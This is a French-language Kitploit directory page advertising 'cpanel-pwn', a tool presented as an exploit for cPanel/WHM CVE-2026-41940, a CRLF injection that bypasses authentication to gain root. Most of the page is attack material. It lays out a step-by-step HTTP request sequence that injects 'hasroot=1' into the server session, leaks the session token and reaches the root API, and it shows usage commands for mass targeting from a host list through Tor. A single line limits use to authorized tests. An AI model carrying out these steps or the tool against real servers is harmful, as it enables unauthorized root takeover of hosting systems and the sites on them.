Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cpanel-pwn — cPanel/WHM CVE-2026-41940 exploit d'injection CRLF pour contournement d'authentification | Kitploit
Outils/GitHubGitHub/richflexpix/cpanel-pwn
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationRed Teaming
GitHubrichflexpix/cpanel-pwn

cpanel-pwn

cPanel/WHM CVE-2026-41940 exploit d'injection CRLF pour contournement d'authentification

Voir le dépôt
1il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

cpanel-pwn

Boîte à outils de test de sécurité cPanel/WHM. Implémente le contournement d'authentification par injection CRLF CVE-2026-41940 et l'élévation de privilèges post-exploitation.

Outils

ScriptObjectif
cpanel_exploit.pyCVE-2026-41940 : injection CRLF → contournement d'authentification WHM → accès root

CVE-2026-41940

Type : Injection CRLF → Contournement d'authentification → RCE root
Affecte : cPanel/WHM < versions corrigées
Attaque : L'injection CRLF pré-authentification dans l'en-tête Basic Auth injecte dans le fichier de session côté serveur, élevant une session non authentifiée au niveau root WHM.

hasroot=1
root@kitploit:~
Étape 1 : POST /login/?login_only=1          → crée une session pré-authentification
Étape 2 : GET / Authorization:Basic <CRLF>   → injecte hasroot=1, divulgue le jeton cpsess
Étape 3 : GET /scripts2/listaccts            → déclenche le gadget de propagation du cache de session
Étape 4 : GET /cpsess[TOKEN]/json-api/version → HTTP 200 + version = ACCÈS ROOT

Utilisation

root@kitploit:~
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only   # vérification CRLF uniquement, sans élévation de privilèges

Autorisation

Réservé aux tests d'intrusion autorisés.

Télécharger l’outil